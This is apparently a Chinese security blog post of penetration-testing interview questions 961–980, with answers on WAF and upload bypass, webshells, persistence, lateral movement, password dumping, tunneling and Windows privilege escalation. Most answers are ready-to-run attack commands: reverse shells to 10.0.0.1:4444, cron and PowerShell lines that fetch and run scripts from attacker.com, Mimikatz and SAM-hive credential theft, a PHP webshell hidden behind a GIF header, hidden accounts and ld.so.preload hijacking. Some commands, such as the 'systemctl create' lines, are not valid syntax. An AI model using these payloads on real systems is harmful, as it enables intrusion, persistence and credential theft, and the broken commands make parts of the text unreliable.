安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[961. MySQL中@和@@的区别](#961. MySQL中@和@@的区别)
[962. 过滤LIMIT后逗号的绕过方法](#962. 过滤LIMIT后逗号的绕过方法)
[963. WAF绕过手法](#963. WAF绕过手法)
[964. 文件上传绕过WAF思路](#964. 文件上传绕过WAF思路)
[965. Webshell不出网处理方案](#965. Webshell不出网处理方案)
[966. 命令行Shell的持久化控制](#966. 命令行Shell的持久化控制)
[967. Shiro不出网利用](#967. Shiro不出网利用)
[968. 横向渗透命令执行手段](#968. 横向渗透命令执行手段)
[969. psexec、wmic、smbexec区别](#969. psexec、wmic、smbexec区别)
[970. 内网密码抓取方法](#970. 内网密码抓取方法)
[971. 抓不到密码的OS版本及对策](#971. 抓不到密码的OS版本及对策)
[972. 管理员会话劫持步骤](#972. 管理员会话劫持步骤)
[973. 内网渗透思路](#973. 内网渗透思路)
[974. 加密密码本破解方法](#974. 加密密码本破解方法)
[975. Windows权限维持](#975. Windows权限维持)
[976. Linux权限维持](#976. Linux权限维持)
[977. 代理转发工具](#977. 代理转发工具)
[978. 无网络层协议的隧道搭建](#978. 无网络层协议的隧道搭建)
[979. 正向Shell vs 反向Shell](#979. 正向Shell vs 反向Shell)
[980. Windows提权方法论](#980. Windows提权方法论)
961 Mysql一个@和两个@什么区别? 962 过滤limit后的逗号如何绕过? 963 WAF绕过的手法你知道哪些? 964 文件上传绕过WAF思路? 965 拿到webshell不出网情况下怎么办? 966 对于不能直接上传而且只能通过命令行执行的shell,应该怎么办? 967 shiro不出网怎么利用? 968 横向渗透命令执行手段 ? 969 psexec和wmic或者其他的区别? 970 内网抓取密码的话会怎么抓? 971 操作系统什么版本之后抓不到密码?抓不到怎么办? 972 桌面有管理员会话,想要做会话劫持怎么做? 973 内网渗透思路? 974 当前机器上有一个密码本,但加密了,应该怎么办? 975 Windows权限维持? 976 Linux权限维持? 977 代理转发常用的工具有哪些? 978 目标机器ping不通外网,没有办法走网络层协议,如何搭建隧道? 979 正向Shell和反向Shell的区别是什么? 980 windows提权的方法及思路?961. MySQL中
@和@@的区别核心区别:
- 单
@(用户变量)
用于用户自定义变量,会话级作用域
示例:
sql
SET @count = 0; SELECT @count := @count + 1 FROM users;生命周期:当前数据库连接有效
- 双
@@(系统变量)
用于系统变量 ,分为全局(
@@global)和会话级(@@session)常见系统变量:
@@version:MySQL版本@@datadir:数据库存储路径@@secure_file_priv:文件导出路径限制示例:
sql
SELECT @@version; -- 查询MySQL版本
962. 过滤
LIMIT后逗号的绕过方法解决方案:
OFFSET替代法 (推荐)
sql
SELECT * FROM users LIMIT 1 OFFSET 2; -- 等价于 LIMIT 2,1子查询分页
sql
SELECT * FROM users WHERE id > (SELECT id FROM users LIMIT 2,1) LIMIT 1;
JOIN拼接法
sql
SELECT * FROM users a JOIN users b USING(id) LIMIT 1;
963. WAF绕过手法
分类与示例:
类型 方法 示例 协议层绕过 分块传输、畸形HTTP头 Transfer-Encoding: chunked字符混淆 Unicode/URL编码、大小写混合 UNI/**/ON SEL/**/ECT注释干扰 内联注释、空白符填充 SEL/*!00000abc*/ECT参数污染 重复参数覆盖 ?id=1&id=union select 1,2,3--缓冲区溢出 超长字符串触发WAF处理失败 id=AAA...(10,000个字符)
964. 文件上传绕过WAF思路
实战技巧:
- 文件名混淆
- 空字节截断:
shell.php%00.jpg- 点号溢出:
shell.................php- 内容绕过
- 添加图片头:
GIF89a<?php system($_GET['c']);?>- 修改Content-Type:
image/jpeg- 协议级绕过
- 多文件上传:在合法文件中混入恶意文件
- HTTP参数污染:
file1=1.jpg&file1=shell.php
965. Webshell不出网处理方案
内网渗透三板斧:
- 信息收集
- 读取网络配置:
ipconfig /all(Windows)或/etc/network/interfaces(Linux)- 探测内网存活主机:
for /l %i in (1,1,255) do ping 192.168.1.%i- 隧道搭建
- HTTP隧道:reGeorg + Proxifier
- DNS隧道:dnscat2
- 横向移动
- 传递攻击:上传轻量级后门(如
plink.exe)- 凭证窃取:Mimikatz(Windows)或读取
/etc/shadow(Linux)
966. 命令行Shell的持久化控制
无文件落地方案:
服务注入
bash
# Linux systemctl create-backdoor.service --exec "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"定时任务
bash
(crontab -l ; echo "*/5 * * * * curl http://attacker.com/shell.sh | sh") | crontab -内存加载
powershell
# Windows powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-ReflectivePEInjection.ps1')"
967. Shiro不出网利用
反序列化漏洞利用链:
JRMP监听器外带
bash
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 "touch /tmp/pwned"DNSLog外泄数据
构造恶意序列化数据触发DNS查询:
payload = URLEncoder.encode(ysoserial.generate("URLDNS", "http://xxx.dnslog.cn"))本地类加载器攻击
- 利用
ClassLoader在目标内存中加载恶意字节码
968. 横向渗透命令执行手段
跨平台方法对比:
技术 Windows Linux 远程执行 wmic /node:192.168.1.2 process call create "cmd.exe /c whoami"ssh user@192.168.1.2 "id"服务部署 sc \\target create Backdoor binPath="cmd.exe /c shell.exe"systemctl create malicious-service哈希传递 Mimikatz pth模块pth-winexe -U hash //target cmd
969. psexec、wmic、smbexec区别
协议与隐蔽性分析:
工具 依赖协议 文件落地 日志记录 适用场景 psexec SMB 是(ADMIN$) 明显(服务日志) 域环境批量部署 wmic DCE/RPC 否 较少(进程日志) 单机快速执行 smbexec SMB 否 无直接记录 高隐蔽性横向移动
970. 内网密码抓取方法
全平台覆盖:
- Windows
- Mimikatz:
sekurlsa::logonpasswords- 注册表导出:
reg save HKLM\SYSTEM system.hiv && reg save HKLM\SAM sam.hiv- Linux
- 内存提取:
strings /dev/mem | grep -i pass- 配置文件扫描:
grep -r 'password' /etc /var- 通用工具
- LaZagne:支持30+软件密码提取
971. 抓不到密码的OS版本及对策
现代系统防护与绕过:
- 受影响的系统
- Windows 8.1+/Server 2012+(启用Credential Guard)
- Linux内核5.3+(启用内核锁保护)
- 解决方案
- 哈希传递(PtH):直接使用NTLM哈希认证
- LSASS内存注入 :使用Cobalt Strike的
nanodump- 硬件令牌窃取:针对Windows Hello等生物认证
972. 管理员会话劫持步骤
Windows RDP劫持流程:
查询会话ID:
cmd
query user # 获取管理员会话ID(如ID=2)生成访问令牌:
cmd
tscon 2 /dest:rdp-tcp#0 # 将会话绑定到当前RDP无凭证接管:
- 使用Mimikatz的
ts::remote模块
973. 内网渗透思路
五阶段方法论:
mermaid
graph LR A[信息收集] --> B[漏洞利用] B --> C[权限提升] C --> D[横向移动] D --> E[目标达成]
- 信息收集 :
- 网段扫描:
nmap -sn 192.168.1.0/24- 域信息:
nltest /domain_trusts- 横向移动 :
- 利用SMB漏洞(EternalBlue)
- 密码喷洒攻击
974. 加密密码本破解方法
密码学攻击四板斧:
文件类型识别
- 使用
file命令或Hex编辑器分析文件头常见加密算法识别
特征 算法 $1$开头MD5 $6$开头SHA-512 U2FsdGVkX1开头AES(OpenSSL) 破解工具链
bash
john --format=raw-md5 pass.txt # 哈希破解 fcrackzip -u -D -p rockyou.txt encrypted.zip # 压缩包破解
975. Windows权限维持
隐蔽后门技术:
注册表自启动
cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\shell.exe"计划任务
cmd
schtasks /create /tn "Cleanup" /tr "C:\shell.exe" /sc minute /mo 30影子账户
- 创建隐藏账户:
net user admin$ Password123 /add- 注册表隐藏:修改
HKLM\SAM\Domains\Account\Users
976. Linux权限维持
内核级后门:
Rootkit注入
bash
# 加载内核模块 insmod reverse_shell.ko rhost=10.0.0.1 rport=4444SSH后门
bash
# 修改sshd_config echo "PermitRootLogin yes" >> /etc/ssh/sshd_config动态链接库劫持
bash
echo "/tmp/malicious.so" > /etc/ld.so.preload
977. 代理转发工具
内网穿透工具对比:
工具 协议 特点 frp TCP/HTTP 跨平台、多级代理支持 ngrok HTTP/TLS 公网穿透、自动HTTPS Chisel TLS隧道 单文件、混淆流量 reGeorg HTTP Webshell代理(ASPX/PHP/JSP)
978. 无网络层协议的隧道搭建
离线通信方案:
串口通信(RS232)
bash
# Linux stty -F /dev/ttyS0 115200 cat shell.sh > /dev/ttyS0USB设备模拟
- 使用Arduino模拟HID键盘执行命令
蓝牙PAN网络
bash
pand --connect 00:11:22:33:44:55 --role PANU
979. 正向Shell vs 反向Shell
核心区别与选择策略:
维度 正向Shell 反向Shell 连接方向 攻击机 → 目标(监听端口) 目标 → 攻击机(连接出口) 命令示例 nc -lvp 4444 -e /bin/bashbash -i >& /dev/tcp/10.0.0.1/4444 0>&1适用场景 目标有公网IP/防火墙允许入站 NAT环境/防火墙限制入站 隐蔽性 低(暴露端口) 高(混合在出站流量中)
980. Windows提权方法论
系统化提权路径:
- 信息收集
- 系统信息:
systeminfo- 补丁情况:
wmic qfe list- 漏洞利用
- 内核漏洞:使用Watson检测并执行EXP(如PrintNightmare)
- 服务提权:AccessChk检测可写服务路径
- 配置滥用
AlwaysInstallElevated:
cmd
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated- 令牌操纵
- 使用Incognito模拟SYSTEM令牌